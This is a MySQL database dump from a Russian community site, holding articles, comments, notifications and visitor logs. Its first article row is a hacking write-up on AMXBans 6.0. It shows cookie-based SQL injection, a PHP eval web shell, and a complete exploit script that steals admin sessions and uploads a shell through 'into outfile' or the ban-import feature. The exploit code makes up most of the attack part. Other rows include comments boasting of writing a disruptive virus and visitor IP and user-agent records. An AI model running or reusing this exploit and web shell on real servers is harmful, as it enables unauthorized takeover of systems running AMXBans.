/> } <br /> if($_FILES['filename']['size'] >= ($config->max_file_size*1024*1024)) $user_msg="_FILETOBIG"; <br /> if(!$user_msg) { <br /> <br /> if(!move_uploaded_file($_FILES['filename']['tmp_name'], "temp/".$file)) { <br /> $user_msg="_FILEUPLOADFAIL"; <br /> } else { <br />.... <br />} <br /> fclose($handle); <br /> //del temp file <br /> unlink("temp/".$file); <br /> $smarty->assign("status",$status); <br /> }[/code]<br /><br />Загрузка файлов есть, но после загрузки и занесения значений в БД, файл удаляется. И файл заливается только с расширениями .cfg or .txt Внимательно присмотревшись к коду, находим строчки:<br /><br />[code]if(trim($bans[0])=="banid") { <br /> //ban with steamid <br /> <br /> if(!preg_match("/^STEAM_0:(0I1):[0-9]{1,18}/",$steamid)) { $status["failed"]++; continue;} <br /> //search for a already existing permanent ban <br /> <br /> $query = mysql_query("SELECT `player_id` FROM `".$config->db_prefix."_bans` WHERE `player_id`='".$steamid."' AND `expired`=0") or die (mysql_error()); <br /> if(mysql_num_rows($query)) {$status["failed"]++; continue;} <br /> <br /> //write ban to db <br /> $status["imported"]++; <br /> $query = mysql_query("INSERT INTO `".$config->db_prefix."_bans` <br /> (`player_id`,`player_nick`,`admin_nick`,`ban_type` ,`ban_reason`,`ban_created`,`ban_length`,`server_n ame`,`imported`) <br /> VALUES <br /> ('".$steamid."','".$plnick."','".$_SESSION["uname"]."','S','".$reason_real."',".$date.",".$time.",'".$server."',1) <br /> ") or die (mysql_error());[/code]<br /><br />Как видим, если условие if выполняется верно, то производиться SQL-запрос, в котором используется ничем не фильтруемая переменная _SESSION[uname], которую мы можем произвольно изменять. Возвращаемся к получению админских прав, и посылаем заместо старого запроса, немного модернизированный:<br /><br />[code]Cookie: amxbans=' or id=1+union+select+1,0x27,1,4 -- 1[/code]<br /><br />Именно 2 поле является значением _SESSION[uname], мы запхиываем туда захексеную кавычку, ибо переменная _SESSION в отличии от остальных HTTP переменных не стипслешиться принудительно. Получаем при любых настрйоках сервера, в uname='<br />Следующим шагом, необходимо выполнить условие в if, что бы наша переменная встала в запрос, ивызвала критичискую ошибку. Код шелла будет выглядеться примерно так:<br /><br />[code]banid blabla STEAM_0:0:1111 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<br />[/code]<br /><br />[code]<?php eval(stripslashes($_GET[c])); ?>[/code]<br /><br />Первая строка шелла так-же проходит preg_match() проверку, и уже после этого, наша ядовитая переменная [uname]=' попадает в SQL запрос, вызывая ошибку кода, соответственно, код который удаляет файл после работы - не выполниться, и мы получим полный код своего шелла в файле, с тем же именем, что и при загрузке.<br />Минус соответственно в том, что не все серверы настроены таким образом, что бы отбрасывать неизвестное расширение, и воспроизводить последнее известное. Не помню как этот мод называется, мод_mime, или как то так.<br />В случае загрузки шелла через скулю, мы получаем полноценный шелл, но мало где у юзверей mysql есть права на работу с ФС.<br /><br />Эксплойт:<br /><br />[code]<?php <br /><br />/** <br /> * @author m0hze <br /> * @copyright 2010 <br /> */ <br />set_time_limit(0); <br />//error_reporting(0); <br /><br />#Exp. for AMX BANS 6.0.0# <br />function echoMan() <br />{ <br /> echo "+---------------------------------------------------------------------------+\r\n"; <br /> echo "I--------------------------AUS for AMXBans 6.0.0----------------------------I\r\n"; <br /> echo "I----------Type: 1) Upload via SQL-inj(!need file_priv=Y)-------------------I\r\n"; <br /> echo "I----------Type: 2) Upload via Import ListBan(!need magic_quote=OFF)--------I\r\n"; <br /> echo "I-----------------------------------How to use:-----------------------------I\r\n"; <br /> echo "I------->php exp.php http://host/path [type(0 or 1 or 2)] [path_to_shell]---I\r\n\r\n"; <br /> echo "I---------------------------------------Example:----------------------------I\r\n\r\n"; <br /> echo "I------------>php exp.php http://exploit.com/bans 2 D:/shellcode.php--------I\r\n"; <br /> echo "I------------------------ by m0Hze for Antichat.ru 2010 --------------------I\r\n"; <br /> echo "+---------------------------------------------------------------------------+"; <br />} <br />/** <br /> * @Socks <br /> * */ <br /> <br />$s=false; <br />$v=false; <br />/** <br /> * @EndSocks <br /> */ <br />if ($argv[1] != '') { <br /> list(, $host, $type, $path) = $argv; <br /> $path = addslashes($path); <br /> $type = (int) trim($type); <br /> if($type == 1){ <br /> AUviaSQL(); <br /> }elseif($type == 2){ <br /> AUviaImport(); <br /> }else{ <br /> GetAminData(); <br /> } <br />}else{ <br /> echoMan(); <br />} <br />function AUviaImport() <br />{ <br /> global $host,$path; <br /> $cookie = "amxbans=' or id=1+union+select+1,0x27,1,4 -- 1"; <br /> $page = curl($host . '/include/access.inc.php', false, false, false, $cookie); <br /> preg_match('#PHPSESSID=(.*?);#', $page, $match); <br /> $post = array('bancfgupl' => 1, 'reason' => 'cheat', 'player_nick' => <br /> 'adminnick', 'server_name' => 'SuperServer', 'ban_created' => '11-06-2010', <br /> 'filename' => '@' . $path); <br /><br /> $upload = curl($host . '/admin.php?modul=iexport', $s,$v, $post, $match[0]); <br /> if (stristr($upload, 'You have an error')) { <br /> return(die("\r\nYou shell: " . $host . "/temp/" . basename($path))); <br /> }else{ <br /> return(die("\r\nI think, MQ=ON. Good bye.")); <br /> } <br />} <br />function AUviaSQL(){ <br /> global $host,$path; <br /> $get = curl($host.'/login.php',$s,$v,'user[]=&pass[]=&action=Login'); <br /> preg_match('#given in (.*?) on#',$get,$match); <br /> $path = str_replace(array('\\\\','//'),'',str_replace(array('include','functions.inc.p hp'),'',strip_tags(trim($match[1])))).'/include/files/'.md5(rand(1,100)).'_1.php'; <br /> $cookie = "amxbans=' or id=1+union+select+1,unhex(0x3c3f706870206576616c28 7374726970736c617368657328245f524551554553545b7065 775d29293b203f3e),1,4 into outfile '$path' -- 3"; <br /> $page = curl($host . '/include/access.inc.php', $s,$v, false, $cookie); <br /> if(stristr($page,"mysql_num_rows")){ <br /> return(die("\r\nYou shell uploaded! Get: $path?pew=system('dir');")); <br /> }elseif(stristr($page,"Can't")){ <br /> return(die("\r\nPermission Denied :( May be file_priv=Y")); <br /> }else{ <br /> return(die("\r\nWtf?! Error")); <br /> } <br />} <br />function GetAminData(){ <br /> global $host; <br /> $cookie = "amxbans=' or id=1+union+select+1,2,1,4 -- 1"; <br /> $page = curl($host . '/include/access.inc.php', $s,$v, false, $cookie); <br /> preg_match('#PHPSESSID=(.*?);#', $page, $match); <br /> return(die("\r\nOk! Session: ".$match[0])); <br />} <br />function curl($url, $socks = false, $version = 5, $post = false, $cookie = false) <br />{ <br /> $ch = curl_init(); // инициализируем Curl <br /> curl_setopt($ch, CURLOPT_URL, $url); // открываемая страница <br /> curl_setopt($ch, CURLOPT_TIMEOUT, 20); <br /> curl_setopt($ch, CURLOPT_HEADER, 1); <br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // вернуть ответ сервера в переменную, а не выводить <br /><br /> // Работа через прокси <br /> if ($socks) { <br /> curl_setopt($ch, CURLOPT_PROXYTYPE, ($version = 5 ? CURLPROXY_SOCKS5 : <br /> CURLPROXY_SOCKS4)); <br /> curl_setopt($ch, CURLOPT_PROXY, $socks); <br /> } <br /> if ($post) { <br /> curl_setopt($ch, CURLOPT_POST, 1); <br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $post); <br /> } <br /> if ($cookie) { <br /> curl_setopt($ch, CURLOPT_COOKIE, $cookie); <br /> } <br /> $page = curl_exec($ch); <br /> curl_close($ch); <br /> return ($page); <br />} <br />?>[/code]<br /><br />Первый - Получение админских прав, и вывод сессии юзера. Если вам просто нужно попасть в админку, подставляем полученное значение в куки.<br />Второй - загрузка шелла через SQL-inj, если позволяют права юзера mysql(file_priv=Y). Сама определяет полный путь до DOCUMENT_ROOT, и пытается загрузить шелл в папку с юзерскими файлами.<br />Третий - загрузка шелла описанным выше способом, через импорт банов. В конце работы выводит ссылку на шелл.<br /><br />Крч, всем бобра","Взлом AMXBans 6.0 Gm 1.2","journal_images/img_975466.png","1426439396","36");
INSERT INTO gazeta_article VALUES("173","21","Итак, начнем.<br />На праздники наткнулся на рекламу загадочного Хостера, который предоставляет VDS с виртуализацией KVM.<br /><br />Но, когда кидаешь от 100 рублей, получаем 200 рублей.<br /><br />Переходим сюда: http://vdsina.ru/<br />На главной набираем email и жмем получить бонус. Потом придут данные от биллинга на почту, и потом заходим в биллинг. Кидаем 100 рублей, и через минуту получаем +200 рублей.<br />И заказываем тариф vds-1, все потверждаем, и ждем данные от машины на почту.<br />Потом из биллинга, кликаем на машину и жмем войти в панель, и там мы попадаем в vemanager.<br /><br />И жмем на ISO образы, там жмем на закачать образ, выбираем url другого сервера, и вводим это:<br /><br />http://download.microsoft.com/download/7/5/E/75EC4E54-5B02-42D6-8879-D8D3A25FBEF7/7601.17514.101119-1850_x64fre_server_eval_en-us-GRMSXEVAL_EN_DVD.iso<br /><br />И набираем название образа. И жмем загрузить, и ждем 10-15 минут.<br />Когда образ закачается, переходим на нашу машину, но нужно ее выключить. И потом идем в раздел диски, выбираем добавить, и добавляем два образа, это: Наша ось, и virtio "драйвера".<br />Образ оси должен первым грузится.<br />И перезапускаем машину.<br />И заходим в VNC.<br /><br />Подробнее в следующей статье.","Шоколад по минимальному рецепту / Либо 2 сесяца полного шоколада","journal_images/img_381614.png","1426444496","36");
DROP TABLE IF EXISTS `gazeta_comm`;
CREATE TABLE `gazeta_comm` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`id_new` int(11) NOT NULL DEFAULT '0',
`date` int(11) NOT NULL,
`msg` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
DROP TABLE IF EXISTS `gazeta_razdel`;
CREATE TABLE `gazeta_razdel` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` char(50) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=24 DEFAULT CHARSET=utf8;
INSERT INTO gazeta_razdel VALUES("21","Компютеры / Серверы");
INSERT INTO gazeta_razdel VALUES("20","Телефоны / Смартфоны");
INSERT INTO gazeta_razdel VALUES("19","Операционные системы");
INSERT INTO gazeta_razdel VALUES("15","Обзоры / Интервью");
INSERT INTO gazeta_razdel VALUES("17","Софт / Программы / Игры");
INSERT INTO gazeta_razdel VALUES("18","Программирование");
INSERT INTO gazeta_razdel VALUES("22","Хакинг / Взлом / Защита");
INSERT INTO gazeta_razdel VALUES("23","Статьи наших пользователей");
DROP TABLE IF EXISTS `guests`;
CREATE TABLE `guests` (
`ip` bigint(20) NOT NULL,
`ua` char(32) NOT NULL,
`date_aut` int(11) NOT NULL,
`date_last` int(11) NOT NULL,
`url` char(64) NOT NULL,
`pereh` int(11) NOT NULL DEFAULT '0',
KEY `ip_2` (`ip`,`ua`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
INSERT INTO guests VALUES("1385288369","Nokia2700c-2","1378047925","1378047925","diz.pablu.ru","0");
INSERT INTO guests VALUES("522946273","Mozilla/5.0","1378047959","1378047959","diz.pablu.ru","0");
INSERT INTO guests VALUES("3162673698","Mozilla/5.0","1378047968","1378047968","diz.pablu.ru","0");
INSERT INTO guests VALUES("3654608406","Mozilla/5.0","1378048157","1378627533","diz.pablu.ru","1");
INSERT INTO guests VALUES("2956722303","Mozilla/5.0","1378048255","1378048255","diz.pablu.ru","0");
INSERT INTO guests VALUES("3654608459","Mozilla/5.0","1378048565","1378048571","diz.pablu.ru","2");
INSERT INTO guests VALUES("1385287789","Nokia2690/2.0","1378048797","1378048797","diz.pablu.ru","0");
INSERT INTO guests VALUES("1357902558","Nokia6120c","1378048988","1378048988","diz.pablu.ru","0");
INSERT INTO guests VALUES("1385290030","Mozilla/5.0","1378049214","1378049262","diz.pablu.ru","1");
INSERT INTO guests VALUES("1385290040","SonyEricssonK800i","1378049252","1378049265","diz.pablu.ru","1");
INSERT INTO guests VALUES("1385288232","Mozilla/5.0","1378049263","1378049263","diz.pablu.ru","0");
INSERT INTO guests VALUES("1385288028","Nokia202/2.0","1378049498","1378049498","diz.pablu.ru","0");
INSERT INTO guests VALUES("785611783","Mozilla/4.0","1378049505","1378049505","diz.pablu.ru","0");
INSERT INTO guests VALUES("785610974","Mozilla/4.0","1378049530","1378049530","diz.pablu.ru","0");
INSERT INTO guests VALUES("1357902681","Mozilla/5.0","1378049579","1378049579","diz.pablu.ru","0");
INSERT INTO guests VALUES("1385289768","Mozilla/5.0","1378049640","1378049640","diz.pablu.ru","0");
INSERT INTO guests VALUES("623737341","Mozilla/5.0","1378049715","1378049846","diz.pablu.ru","2");
INSERT INTO guests VALUES("1385287705","NokiaX2-02/2.0","1378049827","1378049827","diz.pablu.ru","0");
INSERT INTO guests VALUES("1385287980","NokiaX2-02/2.0","1378049835","1378049835","diz.pablu.ru","0");
INSERT INTO guests VALUES("1385288018","Nokia2700c-2/2.0","1378050136","1378050136","diz.pablu.ru","0");
INSERT INTO guests VALUES("3654608454","Mozilla/5.0","1378051052","1378051059","diz.pablu.ru","1");
INSERT INTO guests VALUES("1408311700","Mozilla/5.0","1378051671","1378051671","diz.pablu.ru","0");
INSERT INTO guests VALUES("1385287914","Opera/9.80","1378052160","1378052745","diz.pablu.ru","1");
INSERT INTO guests VALUES("1385288364","Opera/9.80","1378053242","1378053242","diz.pablu.ru","0");
INSERT INTO guests VALUES("3654608712","NokiaC1-02","1378056642","1378056676","diz.pablu.ru","1");
INSERT INTO guests VALUES("1385289741","Opera/9.80","1378056786","1378056786","diz.pablu.ru","0");
INSERT INTO guests VALUES("3654608475","Mozilla/5.0","1378057614","1378057614","diz.pablu.ru","0");
INSERT INTO guests VALUES("1385287865","Mozilla/5.0","1378061932","1378061932","diz.pablu.ru","0");
INSERT INTO guests VALUES("3654608725","NativeOperaMini","1378063881","1378063881","diz.pablu.ru","0");
INSERT INTO guests VALUES("1572134236","Mozilla/5.0","1378073805","1378073810","diz.pablu.ru","1");
INSERT INTO guests VALUES("1385290005","Mozilla/5.0","1378089167","1378089167","diz.pablu.ru","0");
INSERT INTO guests VALUES("1357902486","Mozilla/5.0","1378092042","1378092042","diz.pablu.ru","0");
INSERT INTO guests VALUES("1605730764","Opera/9.80","1378095167","1378095167","diz.pablu.ru","0");
INSERT INTO guests VALUES("1357902772","NokiaX2-02/2.0","1378119289","1378119298","diz.pablu.ru","1");
INSERT INTO guests VALUES("39722755","Mozilla/5.0","1378120672","1378120672","diz.pablu.ru","0");
INSERT INTO guests VALUES("778095531","Opera/9.80","1378121959","1378121959","diz.pablu.ru","0");
INSERT INTO guests VALUES("1385288340","Opera/9.80","1378123691","1378123691","diz.pablu.ru","0");
INSERT INTO guests VALUES("1357902553","NativeOperaMini","1378142253","1378142253","diz.pablu.ru","0");
INSERT INTO guests VALUES("2916132186","Mozilla/5.0","1378142312","1378142312","diz.pablu.ru","0");
INSERT INTO guests VALUES("3654608780","Opera/9.80","1378155236","1378155236","diz.pablu.ru","0");
INSERT INTO guests VALUES("3245313332","Mozilla/5.0","1378193436","1378193436","diz.pablu.ru","0");
INSERT INTO guests VALUES("1505607520","Mozilla/5.0","1378230871","1378230877","diz.pablu.ru","1");
INSERT INTO guests VALUES("3654608762","Nokia5130c-2/2.0","1378231067","1378231067","diz.pablu.ru","0");
INSERT INTO guests VALUES("3002912054","Mozilla/5.0","1378232286","1378232300","diz.pablu.ru","2");
INSERT INTO guests VALUES("2193177816","Mozilla/5.0","1378237143","1378237143","diz.pablu.ru","0");
INSERT INTO guests VALUES("1311757426","ахуеть","1378274834","1378274840","diz.pablu.ru","1");
INSERT INTO guests VALUES("787980807","Mozilla/5.0","1378323666","1378323666","diz.pablu.ru","0");
INSERT INTO guests VALUES("625593849","Mozilla/5.0","1378573173","1378573183","diz.pablu.ru","1");
INSERT INTO guests VALUES("1357902565","Mozilla/5.0","1378579479","1378579498","diz.pablu.ru","1");
INSERT INTO guests VALUES("3645212090","Mozilla/5.0","1378695875","1378695875","diz.pablu.ru","0");
INSERT INTO guests VALUES("3654608471","Mozilla/5.0","1378792713","1378792713","www.diz.pablu.ru","0");
INSERT INTO guests VALUES("1123631744","Mozilla/5.0","1379048854","1379049540","diz.pablu.ru","1");
INSERT INTO guests VALUES("1347677699","Mozilla/4.0","1379133432","1379133432","diz.pablu.ru","0");
INSERT INTO guests VALUES("1347678032","Mozilla/5.0","1390635876","1390635910","la.igorbluz.keo.su","1");
INSERT INTO guests VALUES("1347677815","Mozilla/5.0","1390708646","1390708646","la.igorbluz.keo.su","0");
DROP TABLE IF EXISTS `ignor`;
CREATE TABLE `ignor` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user_id` int(11) NOT NULL DEFAULT '0',
`ig_id` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=22 DEFAULT CHARSET=utf8;
INSERT INTO ignor VALUES("16","1112","573");
INSERT INTO ignor VALUES("5","372","371");
INSERT INTO ignor VALUES("6","371","372");
INSERT INTO ignor VALUES("7","99","80");
INSERT INTO ignor VALUES("8","99","224");
INSERT INTO ignor VALUES("12","569","851");
INSERT INTO ignor VALUES("14","3","971");
INSERT INTO ignor VALUES("21","1293","1201");
INSERT INTO ignor VALUES("19","2","1201");
DROP TABLE IF EXISTS `inthem`;
CREATE TABLE `inthem` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`who` int(11) NOT NULL DEFAULT '0',
`uid` int(11) NOT NULL DEFAULT '0',
`time` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=99996837 DEFAULT CHARSET=utf8;
INSERT INTO inthem VALUES("26330257","168","27","1438164211");
DROP TABLE IF EXISTS `koms_foto`;
CREATE TABLE `koms_foto` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`uid` int(11) NOT NULL DEFAULT '0',
`komu` int(11) NOT NULL DEFAULT '0',
`msg` text NOT NULL,
`date` int(11) NOT NULL DEFAULT '0',
`album` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8;
INSERT INTO koms_foto VALUES("1","3","111","1","Хацкер, хацкер :D","1374943064","91");
INSERT INTO koms_foto VALUES("2","1","111","1","[b]Ответ: bejsser[/b], ) через хакстер сидишь?:) т.к через паблу фотки не видно","1374943196","91");
INSERT INTO koms_foto VALUES("3","3","111","1","[b]Ответ: VITAMIN[/b], до:) смотрел , че у тебя с двига спиздануть бы :D","1374944630","91");
INSERT INTO koms_foto VALUES("4","1","111","1","[b]Ответ: bejsser[/b], нихрена не списданешь :D","1374945678","91");
INSERT INTO koms_foto VALUES("5","3","111","1","[b]Ответ: VITAMIN[/b], ну да)) \ в принципе пока нечего и пиздить :D","1374946789","91");
INSERT INTO koms_foto VALUES("6","1","111","1","[b]Ответ: bejsser[/b], спиздить?:) если напишу какой нибудь модуль ты его повторишь у себя?:)","1374949427","91");
INSERT INTO koms_foto VALUES("7","3","111","1","[b]Ответ: VITAMIN[/b], точную копию врятли:) но попробовать могу:) делай модуль:)","1374952350","91");
DROP TABLE IF EXISTS `koms_note`;
CREATE TABLE `koms_note` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`uid` int(11) NOT NULL DEFAULT '0',
`msg` text NOT NULL,
`date` char(20) NOT NULL,
`komu` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=32 DEFAULT CHARSET=utf8;
INSERT INTO koms_note VALUES("1","8","1","Куда писать?","17.05.13 15:33","4");
INSERT INTO koms_note VALUES("2","7","1","Ето где писать?","17.05.13 15:52","4");
INSERT INTO koms_note VALUES("3","6","1","Создаёте фаил.php туда вписываете код, и переходите по файлу","17.05.13 15:58","4");
INSERT INTO koms_note VALUES("4","20","1","ето что ?? гг:D","17.05.13 16:21","4");
INSERT INTO koms_note VALUES("5","7","1","[b]Ответ: Тимофей[/b], А какую поставить кодировку и права доступа?","18.05.13 08:24","4");
INSERT INTO koms_note VALUES("6","30","1","A kak koпировать это? Сделайте как автологин чтобы можно было копировать","18.05.13 21:44","4");
INSERT INTO koms_note VALUES("7","27","2","Хотел бы дополнить) здесь можно найти по больше информации о бат вирусах . batnik.r u","27.05.13 16:53","4");
INSERT INTO koms_note VALUES("8","17","2","Я также делал вирус который ставит на глав экран сообщения и хрен то сообщения снимиш!<br />П.с. Это мой первы вирус он был создан при учёбе вирусо создания!<br />Так вот той вирус ставил сообщения на глав экран!<br />И создает копию каковота файла который вы вснунете в вирус! И блокирует доступ к папке виндовс!<br />А потом через недельку всё удаляет и возвращяет работоспособность компу и пишит что л***** не разблокировал комп!<br />Я над этим вирусом 3месяца пахал!","27.05.13 18:16","4");
INSERT INTO koms_note VALUES("9","17","2","И и копию файла он делает до такой степини что пока вся памить компа не оффнитсЯ!","27.05.13 18:18","4");
INSERT INTO koms_note VALUES("10","27","2","[b]Ответ: Bot[/b], ахаха харош шутить , исх код такого вируса в открытом источнике найти за 5мин..","27.05.13 18:18","4");
INSERT INTO koms_note VALUES("11","17","2","Щас у ся на планшети храню как так комп один раз в офф ушол уже!","27.05.13 18:19","4");
INSERT INTO koms_note VALUES("12","27","2","ясно","27.05.13 18:19","4");
INSERT INTO koms_note VALUES("13","175","5",")","09.06.13 20:27","90");
INSERT INTO koms_note VALUES("14","26","2","а есть вируса на хост?","19.06.13 19:53","4");
INSERT INTO koms_note VALUES("15","27","7","норм статья )) файлы бы залил","24.06.13 13:44","4");
INSERT INTO koms_note VALUES("16","573","16","<h1>TEST</h1> :D","25.08.13 18:50","1");
INSERT INTO koms_note VALUES("17","712","16","ббббббббббб гг","26.08.13 10:38","1");
INSERT INTO koms_note VALUES("19","3","16","[b]Ответ: Mhack[/b], лал","31.08.13 13:43","1");
INSERT INTO koms_note VALUES("29","3","17","и че работает??","11.09.13 10:44","4");
DROP TABLE IF EXISTS `lenta`;
CREATE TABLE `lenta` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`text` text NOT NULL,
`type` char(10) NOT NULL,
`date` int(11) NOT NULL DEFAULT '0',
`read` tinyint(1) NOT NULL DEFAULT '0',
`uid` char(30) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=259 DEFAULT CHARSET=utf8;
INSERT INTO lenta VALUES("1","1","Veteran оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1420282975","0","forum3");
INSERT INTO lenta VALUES("2","1","Veteran оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420283232","0","forum1");
INSERT INTO lenta VALUES("3","6","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420284696","0","forum1");
INSERT INTO lenta VALUES("4","1","Veteran ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420285371","0","forum1");
INSERT INTO lenta VALUES("5","6","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420292393","0","forum1");
INSERT INTO lenta VALUES("6","1","Veteran ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420292545","0","forum1");
INSERT INTO lenta VALUES("7","6","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420292727","0","forum1");
INSERT INTO lenta VALUES("8","6","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420303965","0","forum1");
INSERT INTO lenta VALUES("9","1","Veteran ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420303997","0","forum1");
INSERT INTO lenta VALUES("10","6","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420304044","0","forum1");
INSERT INTO lenta VALUES("11","1","Veteran ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420350835","0","forum1");
INSERT INTO lenta VALUES("12","6","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420351066","0","forum1");
INSERT INTO lenta VALUES("13","1","Veteran ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420365079","0","forum1");
INSERT INTO lenta VALUES("14","6","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420371030","0","forum1");
INSERT INTO lenta VALUES("15","1","Veteran ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=1&page=\">обсуждении</a>!","comments","1420374468","0","forum1");
INSERT INTO lenta VALUES("16","1","XaPzZ оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426426458","0","forum2");
INSERT INTO lenta VALUES("17","1","IronnHeart оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426426726","0","forum2");
INSERT INTO lenta VALUES("18","1","IronnHeart оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426426929","0","forum2");
INSERT INTO lenta VALUES("19","21","XaPzZ ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426427452","0","forum2");
INSERT INTO lenta VALUES("20","1","IronnHeart оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=103&t=3&page=\">обсуждении</a>!","comments","1426429015","0","forum3");
INSERT INTO lenta VALUES("21","1","vinkh оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426432037","0","forum2");
INSERT INTO lenta VALUES("22","0","Оставлено сообщение в новостях проэкта <a href=\"news_of_project.asp?do=open&news=34\">Открытие сайта</a>.","comments","1426432114","1","new34");
INSERT INTO lenta VALUES("23","21","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=38&p=102&t=2&page=\">обсуждении</a>!","comments","1426432296","0","forum2");
